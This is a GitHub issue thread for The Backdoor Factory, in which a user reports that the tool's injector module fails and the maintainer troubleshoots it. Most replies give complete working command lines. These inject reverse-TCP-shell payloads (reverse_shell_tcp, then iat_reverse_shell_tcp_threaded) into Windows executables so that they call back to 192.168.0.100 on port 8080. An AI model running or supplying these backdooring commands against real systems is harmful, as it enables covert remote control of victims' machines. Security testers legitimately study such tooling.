### ISSUE TITLE
injector module not working

### ISSUE THREAD

**Issue by Da5hes** [secretsquirrel/the-backdoor-factory#63]
![untitled](https://cloud.githubusercontent.com/assets/4195138/14065257/2934d868-f42b-11e5-96a3-aa43409c7b19.png)

**Comment by secretsquirrel** [comment]
Hi,

How did you execute the script? I need the command line arguments.

Thanks.

**Comment by Da5hes** [comment]
python backdoor.py -i -H x.x.x.x -P 8080
same goes for just 
python backdoor.py -i

**Comment by secretsquirrel** [comment]
Found the issue.  To be honest, this isn't used very often (as you can tell) and it's slated to be moved to an external script (https://github.com/secretsquirrel/the-backdoor-factory/issues/7).

Git pull and try again please.

Also you'll need to provide the full payload options (like so https://github.com/secretsquirrel/the-backdoor-factory#hunt-and-backdoor-injector--windows-only).

Or you can do this:
```
/backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp  -u .moocowwow -m automatic
```

**Comment by Da5hes** [comment]
well there is a new issue 
tried
 backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp  -u .moocowwow -m automatic
backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp  -u .moocowwow
![untitled](https://cloud.githubusercontent.com/assets/4195138/14066391/ec1c4c7e-f450-11e5-87a5-52b5fbd1fd9f.png)

backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp  -m automatic

**Comment by secretsquirrel** [comment]
git pull and try again..

Tested on win7 working as expected..

I'm not spending any more time on this code in the module until I make it an external script, please fix the code as you see fit.

Update to the earlier command:

```
note -s changed: iat_reverse_shell_tcp_threaded
backdoor.py -i -H 192.168.0.100 -P 8080 -s iat_reverse_shell_tcp_threaded -m automatic
```
